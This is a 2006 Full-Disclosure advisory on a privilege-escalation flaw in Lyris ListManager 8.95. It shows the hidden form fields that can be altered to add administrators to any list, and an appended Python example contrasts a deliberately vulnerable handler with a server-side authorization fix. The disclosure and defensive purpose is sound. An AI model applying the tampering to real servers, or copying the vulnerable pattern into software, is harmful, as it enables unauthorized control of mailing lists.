Subject: [Full-disclosure] Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list
Date: Wed, 30 Aug 2006 21:14:27 -0700 (PDT)
Advisory: Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list
Release Date: 2006-08-30
Application: Lyris ListManager 8.95
Risk: Depends upon your use and business context
Vendor site: http://www.lyris.com/

Overview of Product:
    "Lyris ListManager is the world's most popular software for creating, 
sending, and tracking highly effective email campaigns, newsletters, and 
discussion groups." http://www.lyris.com/products/index.html

Details of this Vulnerability:
    A design flaw in ListManager's web-based administrative interface allows 
anyone who is an administrator of a list on the server to add an arbitrary user 
as an administrator to any other list hosted on the same server.  Specifically, 
the form one fills out to add an administrator contains a hidden form field 
with the name of the list to which the administrator will be added.  By 
changing this value and submitting the form (using tools like TamperData for 
Firefox), you can add an arbitrary user as an administrator for an arbitrary 
list.

    Here is a sample of these hidden form fields:

    <!-- START OF - save cgi variables in hidden fields -->
    <input type="hidden" name="MEMBERS_.AppNeeded_" value="F">
    <input type="hidden" name="MEMBERS_.CleanAuto_" value="F">
    <input type="hidden" name="MEMBERS_.DateJoined_" value="2006-08-30 20:20:32">
    <input type="hidden" name="MEMBERS_.EnableWYSIWYG_" value="T">
    <input type="hidden" name="MEMBERS_.IsListAdm_" value="T">
    <input type="hidden" name="MEMBERS_.List_" value="[INSERT TARGET LIST HERE]">
    <input type="hidden" name="MEMBERS_.MailFormat_" value="M">
    <input type="hidden" name="MEMBERS_.MemberType_" value="normal">
    <input type="hidden" name="MEMBERS_.NoRepro_" value="F">
    <input type="hidden" name="MEMBERS_.NotifySubm_" value="T">
    <input type="hidden" name="MEMBERS_.NumAppNeed_" value="0">
    <input type="hidden" name="MEMBERS_.RcvAdmMail_" value="T">
    <input type="hidden" name="MEMBERS_.ReadsHtml_" value="F">
    <input type="hidden" name="MEMBERS_.ReceiveAck_" value="F">
    <input type="hidden" name="MEMBERS_.SubType_" value="mail">
    <input type="hidden" name="current_tab" value="Basics">
    <input type="hidden" name="fields_in_memory" value="FullName_ AppNeeded_ PermissionGroupID_ MemberType_ SubType_ Password_ ExpireDate_ SubType_ CleanAuto_ NoRepro_ UserID_ Comment_ Additional_ ReceiveAck_ NumAppNeed_ List_ DateBounce_ ConfirmDat_ MailFormat_ ReadsHtml_ DateHeld_ DateUnsub_ DateJoined_ UserNameLC_ Domain_ EnableWYSIWYG_ EMAILADDR_ IsListAdm_ RcvAdmMail_ NotifySubm_">
    <input type="hidden" name="table_in_memory" value="MEMBERS_">

Further Work:
    Yesterday I was trying to add a user whose name contained a single-quote, 
e.g. "O'Conner."  Frequently, as I navigated the web interface, I received SQL 
errors that printed a large portion of the SQL query along with details about 
what failed.  I'm sure there are SQL injection possibilities here as well, I just 
don't have time to explore.  And where there are SQL injection opportunities, 
there are often opportunities for JavaScript injection.

Recommendations to those using ListManager:
    The risk of this issue to your organization is directly tied to how many 
administrators you have on your mailing list server, how much you can really 
trust them, and the value of your mailing lists.  That is, a company that has 
five administrators for a public list shouldn't care.  However, if you've got a 
lot of administrators and a few lists whose discussions would be worth 
intercepting or disrupting, you're at high risk for abuse as a result of this 
vulnerability.  Until the vendor solves this and other issues, you're going to 
have to have a high level of trust in the people administering your lists, or 
use a different mailing list server.

Best of luck.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
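The flaw the advisory describes is an authorization decision driven by a client-supplied hidden field: the server confirms that the caller administers *some* list, then trusts `MEMBERS_.List_` to say which list is being changed. The following is an added example, not code from the advisory or from Lyris, that models the missing check beside the server-side check that closes it. The form keys mirror the hidden fields quoted above (`MEMBERS_.List_`, `MEMBERS_.IsListAdm_`); the `MEMBERS_.EMAILADDR_` key for the new member's address, the list/administrator mapping and all user names are constructed for the example.

```python
"""Added example (not from the advisory or from Lyris ListManager): a hidden
form field must never be the basis of an authorization decision.

Assumptions, all constructed for this example: form keys follow the hidden
fields quoted in the advisory (MEMBERS_.List_, MEMBERS_.IsListAdm_) plus an
assumed MEMBERS_.EMAILADDR_ key for the address being added; the list-to-admin
mapping and the e-mail addresses are made up.
"""
import copy
import logging

logger = logging.getLogger("listmanager-authz")


class AuthorizationError(Exception):
    """Raised when the acting user may not perform the requested change."""


# Constructed sample state: list name -> set of administrator addresses.
SAMPLE_LIST_ADMINS = {
    "public-announce": {"alice@example.com"},
    "board-private": {"bob@example.com"},
}


def administers_any_list(list_admins, user):
    """True if the user administers at least one list on the server."""
    return any(user in admins for admins in list_admins.values())


def administers_list(list_admins, user, list_name):
    """True only if the user administers the specific list named."""
    return user in list_admins.get(list_name, set())


def add_admin_vulnerable(list_admins, acting_user, form):
    """Models the flaw: the only check is 'is the caller an administrator at
    all'; the list that receives the new administrator comes straight from
    the client-controlled hidden field."""
    if not administers_any_list(list_admins, acting_user):
        raise AuthorizationError(f"{acting_user} is not a list administrator")
    target = form["MEMBERS_.List_"]
    if form.get("MEMBERS_.IsListAdm_") == "T":
        list_admins.setdefault(target, set()).add(form["MEMBERS_.EMAILADDR_"])
    return target


def add_admin_hardened(list_admins, acting_user, form):
    """The fix: authorize the caller against the specific list named in the
    request, using server-side state as the source of truth. The hidden field
    may still carry the list name, but it no longer grants anything."""
    target = form["MEMBERS_.List_"]
    if not administers_list(list_admins, acting_user, target):
        # A submitted list the actor does not administer is exactly the
        # tampering signature worth logging and alerting on.
        logger.warning("denied: %s tried to change admins of %s",
                       acting_user, target)
        raise AuthorizationError(f"{acting_user} does not administer {target}")
    if form.get("MEMBERS_.IsListAdm_") == "T":
        list_admins[target].add(form["MEMBERS_.EMAILADDR_"])
    return target


def demo():
    """alice administers only public-announce but submits a form whose hidden
    list field names board-private. Returns a pair of booleans:
    (vulnerable handler added the admin, hardened handler refused)."""
    tampered = {
        "MEMBERS_.List_": "board-private",
        "MEMBERS_.IsListAdm_": "T",
        "MEMBERS_.EMAILADDR_": "mallory@example.com",
    }
    state_v = copy.deepcopy(SAMPLE_LIST_ADMINS)
    add_admin_vulnerable(state_v, "alice@example.com", tampered)
    vulnerable_added = "mallory@example.com" in state_v["board-private"]

    state_h = copy.deepcopy(SAMPLE_LIST_ADMINS)
    try:
        add_admin_hardened(state_h, "alice@example.com", tampered)
        hardened_refused = False
    except AuthorizationError:
        hardened_refused = "mallory@example.com" not in state_h["board-private"]
    return vulnerable_added, hardened_refused


if __name__ == "__main__":
    print(demo())
```

The hardened handler also gives defenders a detection hook: every refusal is a request whose list name disagrees with the actor's real privileges, which only happens when the form was altered in transit, so these log lines are worth forwarding to whatever monitors the administrative interface.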